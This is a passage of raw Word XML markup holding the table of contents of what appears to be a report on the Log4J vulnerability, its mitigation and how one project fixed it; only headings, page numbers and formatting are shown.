            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223989" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:caps/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>What is Log4J?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223989 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="091D1029" w14:textId="08D581E5" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223990" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Logging/logs:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223990 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B01A201" w14:textId="0687C345" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223991" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Log4J:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223991 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48B0C12D" w14:textId="1C684203" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223992" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Why Log4J?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223992 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FEFB9C2" w14:textId="139AD6B1" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223993" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:caps/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Log4J Vulnerability:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223993 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AB61C38" w14:textId="315FB8A0" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223994" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>What is Vulnerability?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223994 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67657AE4" w14:textId="27B49341" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223995" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>CVSS, CVE:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223995 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B2861E8" w14:textId="2025AD2C" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223996" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Why Log4J vulnerability is important?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223996 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1740DC66" w14:textId="2852E076" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223997" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Log4J Vulnerability:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223997 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E53E3BD" w14:textId="548B1984" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223998" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Log4j Use cases:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223998 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6354835A" w14:textId="63D211EB" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126223999" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>RCE in Log4j?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223999 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C400EA7" w14:textId="30E62866" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126224000" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>How to Mitigate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126224000 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="007EF949" w14:textId="6B16082C" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126224001" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:caps/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Project Experience</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126224001 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="222E061E" w14:textId="1870B404" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126224002" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Is our system impacted?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126224002 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AAD60E6" w14:textId="60892FF9" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc126224003" w:history="1">
            <w:r w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>How we fixed it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126224003 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DFD98D8" w14:textId="486B3F25" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
          <w:r w:rsidRPr="003A290F">
            <w:rPr>
              <w:rFonts w:ascii="DINNextLTPro-Regular" w:hAnsi="DINNextLTPro-Regular"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6055CDA2" w14:textId="77777777" w:rsidR="00162F93" w:rsidRDefault="00162F93">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DD59FA" w14:textId="0F558ED9" w:rsidR="003A5E5B" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
